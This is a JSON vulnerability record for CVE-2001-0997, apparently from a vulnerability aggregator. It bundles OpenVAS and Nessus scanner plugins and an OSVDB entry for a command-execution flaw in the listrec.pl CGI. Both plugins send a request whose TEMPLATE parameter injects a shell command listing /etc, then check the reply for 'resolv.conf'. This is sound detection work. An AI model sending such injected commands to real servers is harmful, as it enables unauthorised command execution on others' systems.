{"openvas": [{"lastseen": "2018-09-01T23:35:51", "bulletinFamily": "scanner", "description": "The 'listrec.pl' cgi is installed. This CGI has\n a security flaw that lets an attacker execute arbitrary\n commands on the remote server, usually with the privileges of the web server.", "modified": "2017-05-02T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010769", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010769", "title": "Checks for listrec.pl", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: listrec.nasl 6056 2017-05-02 09:02:50Z teissa $\n#\n# Checks for listrec.pl\n#\n# Authors:\n# Matt Moore <matt@westpoint.ltd.uk>\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10769\");\n script_version(\"$Revision: 6056 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-02 11:02:50 +0200 (Tue, 02 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2001-0997\");\n script_name(\"Checks for listrec.pl\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n tag_summary = \"The 'listrec.pl' cgi is installed. This CGI has\n a security flaw that lets an attacker execute arbitrary\n commands on the remote server, usually with the privileges of the web server.\";\n\n tag_solution = \"Remove it from /cgi-bin/common/.\";\n\n script_tag(name:\"solution\", value:tag_solution);\n script_tag(name:\"summary\", value:tag_summary);\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\n\nforeach dir( make_list_unique( \"/\", \"/cgi-bin/common\", \"/cgi-local\", \"/cgi_bin\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string( dir, \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\" );\n\n if( http_vuln_check( port:port, url:url, pattern:\"resolv.conf\" ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSnort Signature ID: 1470\nSecurity Tracker: 1002404\n[Nessus Plugin ID:10769](https://vulners.com/search?query=pluginID:10769)\nISS X-Force ID: 7117\n[CVE-2001-0997](https://vulners.com/cve/CVE-2001-0997)\n", "modified": "2001-09-11T00:00:00", "published": "2001-09-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:640", "id": "OSVDB:640", "title": "Textor Webmasters Ltd listrec.pl TEMPLATE Variable Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:07:42", "bulletinFamily": "scanner", "description": "The 'listrec.pl' cgi is installed. This CGI has a security flaw that lets an attacker execute arbitrary commands on the remote server, usually with the privileges of the web server.", "modified": "2018-06-13T00:00:00", "id": "LISTREC.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10769", "published": "2001-09-26T00:00:00", "title": "Textor Webmasters Ltd listrec.pl TEMPLATE Parameter Arbitrary Command Execution", "type": "nessus", "sourceData": "#\n# This script written by Matt Moore <matt@westpoint.ltd.uk> \n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Revised plugin title (12/30/10)\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10769);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2018/06/13 18:56:27\");\n\n script_cve_id(\"CVE-2001-0997\");\n \n script_name(english:\"Textor Webmasters Ltd listrec.pl TEMPLATE Parameter Arbitrary Command Execution\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitray commands may be run on the remote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The 'listrec.pl' cgi is installed. This CGI has a security flaw that \nlets an attacker execute arbitrary commands on the remote server, \nusually with the privileges of the web server.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Remove it from /cgi-bin/common/.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.textor.com/index.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/alerts/2001/Sep/1002404.html\" );\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2001/09/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/09/11\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for the listrec.pl CGI\";\n \n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2001-2018 Matt Moore \");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\n\nif(!get_port_state(port))exit(0);\n\n\ndir[0] = \"/cgi-bin/common\";\ndir[1] = \"/cgi-local\";\ndir[2] = \"/cgi_bin\";\ndir[3] = \"\";\n\n for(i=0; dir[i]; i = i + 1)\n {\n item = string(dir[i], \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\");\n req = http_get(item:item, port:port);\n res = http_keepalive_send_recv(port:port, data:req);\n if( res == NULL ) exit(0);\n if(\"resolv.conf\" >< res) {\n \t security_hole(port);\n\t exit(0);\n\t} \n }\n \n\nforeach dir (cgi_dirs())\n{\n item = string(dir, \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\");\n req = http_get(item:item, port:port);\n res = http_keepalive_send_recv(port:port, data:req);\n if( res == NULL ) exit(0);\n if(\"resolv.conf\" >< res)security_hole(port);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}